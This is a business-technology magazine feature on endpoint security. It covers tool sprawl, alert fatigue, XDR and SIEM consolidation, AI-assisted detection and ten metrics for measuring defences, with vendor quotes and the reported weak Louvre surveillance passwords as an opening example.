A constant refrain in the security sector is that everything is an endpoint. If it’s connected to the internet, it’s an endpoint. Endpoints need protection and they’re often neglected. While the criminals who broke into the Louvre in broad daylight in October used prosaic methods, it turns out that the museum’s cyber policies were also in need of a dust-off. According to Libération’s investigative unit, the password to the museum’s video surveillance server was “LOUVRE”, while “THALES” got a user into the software platform.
“Today’s attackers aren’t the amateurs of the old days,” says Roy Alves, national sales manager at J2 Software. “They’re adaptive, stealthy operators exploiting the very conveniences we’ve built into our everyday digital lives.”
Ross Saunders
Ransomware targeting endpoints has increased, often via unpatched vulnerabilities or phishing lures that AI makes even more convincing. Malware-free attacks, where adversaries use legitimate tools like Power- Shell, are also increasing, evading traditional signature-based detection.
“Add in the chaos of BYOD and remote work, where unmanaged devices are increasingly more common, and you’ve got a recipe for disaster,” says Alves. “Regular endpoint security isn’t keeping up with how attackers operate today,” says Craig Freer, Qwerti MD. Even though endpoint detection and response (EDR) integrated with threat intelligence is now more common, getting real-time visibility into tactics like supply chain compromises or browser exploits is challenging, says Alves. Many companies are still reactive, patching after the breach rather than predicting with AI-driven behavioural analytics.
“If your endpoint strategy isn’t simulating attacker playbooks or incorporating zero-trust principles, you’re not keeping pace; you’ll always be playing catch-up,” he says.
As new threats present themselves, businesses get sold on buying just one more layer or adding another tool into an already crowded cyber stack. According to the IBM Institute for Business Value, organisations are now juggling on average over 80 security solutions from 29 vendors. “It’s the siren’s song of cybersecurity sales. Stacking tools often turns your security stack into a Frankenstein’s monster – powerful in theory, paralysed in practice,” says Alves, adding that tool sprawl can lead to IT fatigue. When an organisation has overlapping solutions without decommissioning legacy systems, it’s not only complex to manage, but IT administrators may miss important alerts amid all the noise. “Not every alert is a security risk, but they do need to be interrogated,” says Freer. “The volume often means they just get ignored, which defeats the main purpose.”
Rolling everything into a SIEM and having a security operations centre monitoring it in an aggregate manner gives visibility across
the infrastructure.Ross Saunders
This results in a complex environment where response times increase and mean time to detect increases. Alves says technical teams may find themselves drowning in false positives. More tools rarely mean more protection; they breed inefficiency.
Another problem with tool sprawl, says Steve Porter, Metrofile Cloud’s managing director, is that every individual security tool or product may fail at some point. “If you layer the wrong tools, you’re potentially decreasing your security along with your system performance,” he says. He believes the answer lies in planning and measurement. “Start by ensuring comprehensive device coverage. Every endpoint within the organisation should be visible, monitored and protected,” he says. “An effective alerting and monitoring system is essential to flag potential threats early.”
Roy Alves, J2 Software
AI is also helping defenders stay ahead by strengthening EDR. Instead of relying on manual log reviews or signature based alerts, AI can identify suspicious behaviour in thousands of endpoints in seconds, detecting patterns that would otherwise go unnoticed. Ross Saunders, an international cyber speaker, says the increasing use of AI is allowing for deeper and faster analysis of outliers and threats and can pick up trends in logs far quicker than a manual search. Combined with automation, these systems allow security operations teams to concentrate on proactive defence, finding anomalies on individual devices before they spread through the network.
Metrofile’s Porter says visibility and consistency are critical, and measuring effectiveness is just as important as detection. “Technology alone isn’t enough. You need a skilled team to investigate and validate alerts.” He adds that this will help to distinguish genuine threats from false positives while keeping business productivity uninterrupted.
Technology only works if it’s integrated. A good starting point, says Saunders, is to implement a centralised XDR (extended detection and response) so that all devices feed into one dashboard. Isolated installations, he says, don’t offer the same value because they can’t show how different systems interact. Adding network monitoring, intrusion detection and mobile device management builds that picture further, creating a more complete view of the organisation’s health. “Rolling everything into a SIEM and having a security operations centre monitoring it in an aggregate manner gives visibility across the infrastructure, from endpoints to internal networking hardware,” he says.
But even the most unified systems must still contend with the staff using them. Security teams now need to weigh protection against privacy, often making trade-offs that affect both productivity and trust. On company owned devices, controls can be enforced with relative ease. On employee devices, those same safeguards can feel intrusive or overreaching. The challenge is finding an approach that respects both. “Endpoint security isn’t about building taller walls; it’s about smarter sentinels,” says J2’s Alves. “Ditch the tool-hoarding, embrace measurable evolution, and design for humans first. The attackers won’t wait. Why should we?”
TRUTH OR DARE
Metrics are important because they show whether endpoint defences are working or just adding noise. A well-designed measurement strategy links security effort to business performance, translating alerts into evidence. Steve Porter, Metrofile Cloud’s MD, says the process starts with clarity. “Every endpoint within the organisation should be visible, monitored and protected.” From there, it’s about measuring protection, speed, reliability and value, knowing which numbers tell the truth about resilience.
1. Device coverage rate
How many endpoints are actively managed and secured? Gaps in coverage mean hidden risks. Unseen devices are often where breaches begin.
2. Threat-detection accuracy
Measure how effectively your system identifies genuine attacks. The stronger the detection rate, the better your defences understand today’s threat landscape.
3. False-positive burden
Track how many alerts turn out to be harmless. Too much noise blinds teams to real danger and increases fatigue.
4. Response velocity
Assess how quickly your team can detect, contain and recover. Every minute between discovery and action shapes the size of the impact.
5. Patch and hygiene compliance
Out-of-date systems remain the most common entry point. Measuring how consistently endpoints stay patched and configured is basic but vital.
6. Behavioural anomaly visibility
Can you see when devices behave oddly, logging in after hours, connecting to unusual networks or downloading strange files? These patterns often reveal compromised users.
7. Endpoint availability and performance
Security should not slow productivity. Track downtime linked to protection tools and ensure controls safeguard both speed and stability.
8. Tool integration and alert efficiency
Measure how well your endpoint tools talk to each other. Integrated systems reduce alert duplication, cut manual checks and improve response times.
9. User awareness and policy adherence
Even the best technology fails without engaged people. Monitor how often employees follow security practices or trigger policy exceptions.
10. Cost-efficiency and business impact
Calculate the value of prevention. Link spending to incidents avoided, time saved and business continuity maintained. Effective security proves its worth in outcomes, not invoices.
USABILITY, COST AND CONTROL
Endpoint security doesn’t exist in isolation. It underpins the way businesses run – the tools employees use, the systems they depend on and the budgets that keep them going. Every connected device, from laptops and cellphones to servers and surveillance cameras, is open doors if left unguarded. “Too much control chokes productivity; too little invites breaches,” says Roy Alves, from J2 Software.
Stacking tools often turns your security stack into a Frankenstein’s monster – powerful in theory, paralysed in practice.”
Roy Alves, J2 Software
Getting the balance right means protecting what matters without slowing people down or spending where it doesn’t count.
• Make access invisible: Password-less authentication and risk-based access simplify user login without compromising control. These technologies also reduce the risk of credential theft, which remains a leading cause of endpoint breaches, according to Verizon’s ‘2025 Data Breach Investigations Report’.
• Reduce overlap and fatigue: Security teams often manage dozens of agents doing similar jobs. Consolidating these through unified endpoint management platforms improves system performance, and gives administrators one point of control.
• Spend smarter: Endpoint protection scales best on SaaS models that grow with the business. As a benchmark, analysts recommend endpoint security investment should sit at around 10% to 15% of total IT spend. The rest of the budget goes to training and awareness, tools, licences and good governance.
• Support the people behind the policies: Every layer of security changes how someone works. When controls are communicated clearly and tools are easy to use, employees stop looking for workarounds, and your defences become stronger for it.
